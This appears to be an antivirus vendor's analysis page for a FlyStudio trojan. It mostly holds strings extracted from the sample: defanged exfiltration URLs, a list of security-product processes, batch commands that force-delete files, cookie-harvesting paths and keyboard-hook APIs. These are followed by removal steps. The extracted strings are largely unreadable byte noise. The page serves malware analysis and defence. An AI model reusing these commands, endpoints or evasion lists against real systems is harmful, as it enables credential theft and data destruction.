!%%%))$))$))#((#((&  )//',,&  %**&  #((

""#(( 11)..*//,22',,)..

$$!$$$(($((#&& $$'**#''#''(-- $$

"&&$))'  &  ',,)//)..(--&,,&  )..

&  &  #((&  %**-33

## $$$((

""&**#&&#&&"&&(  "''!%%&***00"&&

$))%**&,,"''$))%**%**$))$)))...44

!!!&&%***00,22

"" %%$''"%%

##"'').. $$

"""&&"&& ##"''!%%$(((.."''

!%%"''$((

$((%)) ##!$$

""!%%!&&"&&$))#((

!!#'' 11"''!&&)..

$$&  '--!&&)//)..%**).. 11

###''$(("''

$$#'''--%**"''$((

!!#((-33 11',,$)))//&  !&&(--)..

#((#((&

#((,22 11(..&  $)) 00',,!%%*00',,

##$((%))

#''!%%"''"&&#''$)) $$ $$#((#((

!%%)//-33)//)..$))

*00$(( 00(--%**

!!!%%,11-33',,/55*00$))

&,,&  -33(.."&&

$**%**%))$))

%))!%%#(( 11,11)..(--)..-33&

#'' 00,22,22!%%

#&&#'' ##

!%%#(('--)//)--%***//(--

$((,22(..(--)..

!%%&  %**&  '  '-- 11*00&

"&&)..$))(--.44

"&&&  '--$)))..(..&,,(---33'--

#((*00*//%**

#&& $$ $$ $$#''$((%**

!%%%  &  &,,)--(..!%%',,

$)),22)//

%**%  ',,',,&  #''&

###''(,,

"''"&& $$

!%%$))'--&**%**(--',,)..(--*//.44 11

$'' $$$((

"''"&&%)))//

'--&  $(($(((--#((%**(--',,*004;;',,

##%**%))!%%#''

$$"&&%))"''&  ,11!%%

###(('  *//)//)//#''&  '--)..*00,22*00 $$

!$$(--!$$$(($))%))%))

""%))'  %**"''*//)//

%  '  *00*00"''

!!$))*00 11(--(--.44*//

""!$$#''$''

&  #))%)))--',,

## $$%**'--&  #''#((

!!&  &   11)..*//(--',, 00

"" %%"%%!$$

##%**#'' ##

$))!%%"''$((#''$((#'' $$#''

""%))"'' ##"&&!%% ##"''$))!%%#((

""!%%!$$

"%&&**(--!&&*../55

!$$(,,!$% $%

""!%%(,-',,'*

!"( ,(,-

(--"%&)-.&**!$%

$$&**%**(-. /0$(($'( //

"&&$(("%%

!%%!%%"%%

!%%#))&* &))&**(-.%**&**$()(-. 00

%((!$$!$%

#'(&))%))!%%"%&

"&&.44)-.

$&'!$% $$$))

$(('** $$

"" -.077 00&* *./ ##

$'( 11'  %))'*

$% #$ #$

$''*//%**

&**#'(#&&

!!-11066#''

'  $))(,,

""%()#((

##(,,%**

"&&&)*$((*00

%**(-- //

#&'&*  $$

#''&* )./

%((#((%))( ,*,-

## $%"%%

(,,"%&&)*(--

"%%(-.599055

!! ##$((%((

$$#'("&&%(("%%%**#&'',,.33 /0

! "#$(((--/349>?' ,

"# $$!$$ #$"%%"&&

#$%((!%%!%%#''%))(,,,12&**

!!"&& #$

""!%%(..*/0(,,056277#()$))

""&**"''

##"''!%% %%)..

)/0/55(,,' ,(--#''

##'  ,//

!!"&& ##

"""%&!%%%**

""!%%$((

##%))#''

"&&#'($()#%&#&&%)*#'(' ,&* *,-%((

"%&'*,$&( "##&'%'(#%&(* "%&(*

"""%%!##

$$ $$ ##"&&!%%"%%$((%**

"""&&#&&#&&"&&%))%()( ,&))%()*-/*-/

*.0),.!$%#%'&)*#&'(*,),.$')

!!"%%#&&

## ##!%%$((!$$!%%!%%',, //

'**#''!%%#''"''%(($()( ,&* (,-/45'

-13%()"$%%'(&)**-.),-( ,

"" ""$''$((

""!$$#''

##$((#''"%%#(( ##'  "&&

&  $((%)) //&)*' ,'* %()&)*( ,*./%()

(  ,00#&&&))&** // ./),-

!## """%%%((

###''&** %%$''#'' $$&  &**

!!#''#''(,-*-.'* %()'  #''$'(&().33,00

*..&**(   //'**)--)--

###&&&* #'''* %)*

"""&&%'('  $''%)).22)--'  (   //(  '  "%%!$$

!$$%))"&&$)) $$&**$))'  '  )-.$() #$

&**&))'

(  &**#&&

"$$ ## ##

""!%%$((

',,!%%"&&' ,( ,

"#&)*%))

'* ' ,$'(&* ' ,

$''$''#&&

#''#''&**(,,

#((!%%%))"&& #$

#''$'''* (,-

&* )-.&* (,-' ,

#&')-.)-.

##!$$*//#''

)..)--' ,&* *./

' ,!$%$()%))'

&)) //(,,(,,

'  %**#'')--

"&&$''',,

!!#''',,&**&* ' ,)-.

'* #&'*./&))),,

##),,-11-11),,$''

!!)--'  $''#&'&* &)*)-.

( ,%)*(,,*..*..

)--*..),,*..%((%))

#$"&'!%&"%&$)*#&'

$((#''#''#&&#''%**)--&**%))$'(%))"&&

)-.(,,),, //

.22(  "%%&**'  "%%

"#%()!&&

%* &* (-.(,-'**%)*%()( ,

%((%((#&&%((%((

(,,#&&'  (,,*..)--

%)*"$%"%%!$%

!%& #$%()

#'(%()&* !%&#'($()$')#&(#'(( --13

##$'')-- //*..%(('   //*..*..

&* $()#&'

%* .23#'(

%()#'(!$%!$%%)*%(*#&(%) $')( --13&)*

%()&* (,--12( ,&* (  *..'

!""%&%()(,-#()$'(#&'#'(),-),- $%

#'( $%"&&' ,)-/%(*&*,%)*&* )-/-12

!#&'$'()-.'* '*  /0-12)-.

#$$'("%&

!$%#'("&'#'($()$))&)*),-&* &*

!"%)*#'(%)*)./',-(-.' ,&* &  '  *./#&&

!$%"%& /0'  )-.*./ /0,01

!" "#!$%

##!$%(,-!$%

!!"&'#'(!$%#'(#()#&'#&'%* ,12*-.

#'($))%()%)*(,-(-.',-#(($()"%& /0/34!%%

#&&( , /0)-. /0&)*'*

""!$%' ,!$%

""#'("''

##"$%"&'$'(&)*"%&

"%&#''' ,$'(%()

"$$#''"%&

"""%& ##

""%'(#&&

! ##(  !$%

"#!#$ #$ $$

"#"&&%))),-!%%

## $$ $$

##"%%#&&

""!%% $$!&&$))"&&',,

""!%%!$$"&&!%%

""#&& $$#''

#'',11!$$

!$$ $$!%%#&&!%%

!! $$%**

!!!$$#((#(($((

#&&$((&**

##!%% $$#''"&&

!" "# ##

%%!%%%))%))

%))"&&!&&',,

$$"''"%&

!%%!%%&**#''$((#''"&&%**%))&  %** $$

"&&!&& $$

#$ %% $%

##%)*#'(

#()!$%"%&$))"''#()"'' $$#''!&&&** $$

"&&#''#''#''

"#"&' #$

!%)*#&' $$"&' %%

#$"&'$() %%$'(&)*&)*

!!%%%))$''$((#&&

#$!$%!%&

(,-'--!&& $% $$ $% $$#'(#&'!%%%)*"%&

#'(#&'"&&#'(#'(#'(#&'

"" !" ###%&

#$"$% #$%)*#'(!$%

"##''$()$()#'( $$#&'$()%))%* !%&#(( $%

#$)./#()#()#&("%'"%'!$&

[LoginUserRecord]

IsRecordPass=0

Client.exe

LoginQ.dat

Msimg32.dll

crossfire.exe

9<=012;=>}

/0/(((--,---((("##((('('

'''%%%   ''&$$$(((()('('

(((***)*)

&&&$$$%%%* *

   ,,,)**%&&)))

$%$%%%* *

%$$&&%(('332,, $$# ,*(('('' *)('' **''&''&)(((('

887/-,('&&&%&&&

** ))***   ,'()&&''(),,-

** ))*''(

%%&()*%%&

()** ,''($$$%%&**

.01** $$%

&&&<<<100

!!"!!!"""###/..=<;'&'$$%&%&*)**))%$%&&'*))''''&'%%%

445-* ,**,  *)*

(()  ,--..-/001-./''(()*

%%&%%&'((

))*&&'''((()--.

)()(()767?>>#""

&&'""#--.

%%%&&%%%%#""@??///&&'''(%$% ))/..&&'* *(((   *))

557 ()-***()*)

,,-''(('(436//0--.))* ,-

,,-(()&'(

()*--.,,-))*''(

))*(()(()()*()*

((($$$$#$:::888&&'   )())(), ,*)*('( * , ,*)*

757*)****'&'(()

''(** (()(()''((()&'()*

()),,-  ,

001-,.* ,

))** ,''(

012--.  ,,,--..,,-

&%%  ,('(:9:@?@)))-,,***,,,-,- **)))('(, , *

  ,** 111*) 234  ,))* ,-

)**  ,))***

  ,../012

../--.* ,  ,

//0000** 001001//0667--.

001../ ,-888

))*** ./0./0

223122 ,-  ,  ,001//0223

234324../  ,

001  ,**

113112//0

  ,** ../ ,---.001--.

,,,000/..

-,-.--...100

?>>=:9544,,,/./

999112  ,001**   ,223122

556445445345

-./--.-..

--/234//0

001-./  ,--.001

IIIJJIDDD...DCD:::000, ,...222666322544///../---211

?>?322../111:99

../,,-00112355698999:889

--.,-.//0

223445001...532//.../421000

///** )))/./

,11),, $$*/0$(("&&!%%"&&"&'*/0'**$((!%%&))#&''  !$%!$$ $$&))#''

##%'("''',,).. 01 00(,-*00&** /0(,- /0'  !$%

$$%**%((#&&"%&"%% "#

'* #'(%))!$$%()

!!!%%$'("&&

""#&'(  ' ,%**$(((--%())..#'(

!"&* %)*&* &* "&&'* !%%

!! ##( ,#&'

"%&-33' ,$((&* "%& #$#&&$''!$%',,(,-(--).. 00)./

""%())--%(('  #&'

""&**'*  ##(,,*..

"$%&**&**#&'#&&',-',,&* $))#&'$''&))$()%***//&

##(--',,&,,(--(--(--$'((  %((&* "%&*-.$((

#'''  %))#''

##&)*%))$(("%&$()' ,'  "&&(--$))

""#((.44(--(--',,&  &  "&&,/0),-(,-"%&$''

!&* .33(,-)-."%%

!!!%% ## "#&* ',,!$$

!"%()$))!&&(--066*00(..(--(..%**$)) #$#''&))( ,!%&!$$

""-11 01#&')./#'(

""%()"%&#'()--&))

""'  /44$))$))-33 00',,',,*00 11&

!%&#&'%)*$()#&&)--&))&**"%%%**)-.

$&'(,-$''"%&'  -22( ,%**)..$))#((',,',,*00(--/55&

$%(,- 11*-.)--#''%))&))$(('  &**

)..)..)--',,%**%((*00&,,"&&&  ',,%***00%***00/55(--

( ,/45',-,00(  (,-( ,"&&#'''  )-.

$$*00*./$()' , 11.44,22$((%**)..&  *00,22',,(..067&**

&* '  #&&#'( /0'** $$ ###&' 01-23',,

"&&$(($() 00 00

##177',,$((&,,(--,22 11*00&,,/44066(,-

 //( ,!&&(,,$((!%&"%&$'((-.-22067#%&

*..,12&

*//.44%**(--(..-33-33 11$((.12278177'

##'* '* .34045&  $(( #$(,-*///44.22$'(

"#*00178.44

,22(..*//-33).. 11 11%**)./( ,,12399)..

#&&' ,*-.045'* ',-"&''**),,',-(-.*//$'(

%**-23066 11)//*//-33*//)..#((#''%**%)*( ,%** 005;;"&'%**-12-22' ,)./&

""$'(%))$((&)*)-.,12

"#$()',,)//288&,,',,*//(..$))

"''(..)..'**#&'$((3786;;-11-23.44#''!#$

"&&&))#&&$((%**(,-)-.',-',-(--).. 00%**%**$))

!!&  *00)..)--#'((-./33-22/23'  (,, 00"&'

##%((%(('  &  "''(--(--(-.& ,*/0,11*00)..(--&,,!&&

!!%** 11 11)//%** 00166/44,11-22),-*..'* !%%.22%))'* $))!%&!%&' ,*00',,$()(--*// // 00)--#&'!$% ./155 11-22 //(,, 11.44.45.44(-.%)*$()#((.22-34' ,$()%()!$%$'(&* *./',,)//&* $(( /0-22%))$((/44389067)-.&**-22-12 12)/0.44.33 00$((#&'066.45,22%**#'('* $(( //)./ /0 00 11!$%

!%&$((&***01"'')//,23 12,22.44$'(&))

#(()./)--&* 3::167)-.&  ,22-33,22',,*//-33,23,11-23%**

!%%,22/34(,,055.33/44-22-23&()*-.(-.

%)*%)*%**,12' ,&* %**(,- 01177*00(-.*00,12)..,235:;-12

%**,12-22055)./-22.34-23)./&* 056-23

#$*..),-'**!$%

""$((&**-33,/0)//-23/45*00(---334:;&*

"''( ,',- 00 /0.45,22(-.' ,-12.23155

"&&,12)..!%&

"&&"%%,22*// 11*./.44/55 01(-.-33.34#'(

( ,*../44/45,00.44(..%)*&* ( ,178056

',,)./$((

!"#()&  "%&!$%

#$' ,*//

$$"%&&*  $% #$

%%%**%**!%%

$%"%&#&' #$

!%%!%%%)*"&'!%%

#$%)))--

!%%%()"%% $$!$%

!! #$!%% $%'**(,-

<>>/00&&&

000)))&&&!! //.

 ./034034

""-00255134

 -.489-01477699

(* 8;<9<=478 ./2557;<

%%%(((

))),,,...

tc_url=[

cwburl=[

pay.title=[

hXXp://

hXXps://

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

HTTP/1.1

Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Content-Type: application/x-www-form-urlencoded

.rsrc

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

del /f /s /q "C:\chuanyuehuoxian\*.exe"

del /f /s /q "C:\chuanyuehuoxian\*.bat"

del /f /s /q %systemdrive%\*.tmp

del /f /s /q %systemdrive%\*._mp

del /f /s /q %systemdrive%\*.log

del /f /s /q %systemdrive%\*.gid

del /f /s /q %systemdrive%\*.chk

del /f /s /q %systemdrive%\*.old

del /f /s /q %systemdrive%\recycled\*.*

del /f /s /q %windir%\*.bak

del /f /s /q %windir%\prefetch\*.*

del /f /q %userprofile%\cookies\*.*

del /f /q %userprofile%\recent\*.*

del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"

del /f /s /q "%userprofile%\Local Settings\Temp\*.*"

del /f /s /q "%userprofile%\recent\*.*"

TCLS\Client.exe

avp.exe

ashDisp.exe

ccSvrHst.exe

avcenter.exe

secenter.exe

spiderui.exe

egui.exe

mcupdui.exe

KvMonXP.exe

RavMonD.exe

kavstart.exe

360sd.exe

FilMsg.exe

360Tray.exe

QQPCTray.exe

BaiduSdSvc.exe

/id.txt

post_asp3.asp?Number=

/post_xinxi3.asp?name=2051C9

/post_xinxi3.asp?name=

/post_xinxi.asp?name=6986

msxml2.XMLHTTP

hXXp://w1d2wodescak.a5.namepu.com/

858583725

VVV.3600gz.cn

VVV.meitu.com

?.rNho

J)ui%d

hXXp://open.baidu.com/special/time/

window.baidu_time(

hXXp://VVV.xici.net.co/

\Mdserver.ini

/regdate.txt

/delf.asp

MDserver.exe

100 = 100

(MDserver.exe),

\MDserver.exe

.pHp 7

.PET`pV

/Cp.dB

k\\%Sy

u.HsL

Ey%fpml

5l\UWSSHh

e.APS

.htc(:

@.Be$>;

%Do2P

.odNh

"&HK.fJ

fDRÔ

p(.vp

JKpJ.HW6

A.tCD

IG-%um

%uDQ'%,m

.omc0d

.dll,OpenProcess

hXXp://e.*9

p00gz.cn|

O.OPP

*1%*.*f

CNotSupportedExceptionk

_CmdT"

E,.MSVCRTgr

.PAVC@

(&07-034/)7

V2.ZN

zcÁ

4Gl.chs\S

qg]Key

ADVAPI32.dll

comdlg32.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

RegCloseKey

ShellExecuteA

Mdserver.exe

Mdserver.ini

\QQLogin.exe

/id2.txt

/post_xinxi.asp?name=

\MDserver.ini

hXXp://w1d2wodescak.a5.namepu.com/bug/post_bug.asp?bug=

hXXp://VVV.pet1990.com/?gy

Super-EChXXp://VVV.super-ec.cnhXXp://VVV.eyybc.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php

hXXp://VVV.super-ec.cn

<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()

Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")

getcpuid=cpu.ProcessorId

User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)

InternetOpenUrlA

eyybc.com

super-ec.cn

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HttpAddRequestHeadersA

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies

\*.txt

scripting.FileSystemObject

%Documents and Settings%\IBM\Cookies\*.txt

Content.IE5\

(@ole32.dll

858583725

QQ.txt

|*.txt

.mKD1

.Ckg4

(.gi6

hXXp://pan.baidu.com/s/123q7b

.LP&_#

.aVPX0

I%FI8

[email protected]

E.fW*

/30/15/7

]~.DS

cERT

U%XR

V.gk-

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

VVV.dywt.com.cn

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

%d%d%d

rundll32.exe shell32.dll,

(*.htm;*.html)|*.htm;*.html

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

Fckh/message.txt

ge.txt

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

WinExec

GetProcessHeap

RegOpenKeyExA

RegCreateKeyExA

GetViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

SetWindowsHookExA

GetKeyboardLayout

VkKeyScanExA

keybd_event

RegisterHotKey

UnregisterHotKey

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

.text

`.rdata

@.data

%FN~{

&*397@@>?92-#

$/.EI!

!>VeptcP8

.GZ\K/

<Udp^K6'

1, 0, 6, 6

- Skin.dll

88.88.5.41

{7BF80980-BF32-101A-8BBB-00AA00300CAB}

(*.*)

%original file name%.exe_1100_rwx_10000000_0003E000:

`.rsrc

L$(h%f

SSh0j

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

1, 0, 6, 6

- Skin.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.FlyStudio_2ea4ff5287

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.FlyStudio_2ea4ff5287

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet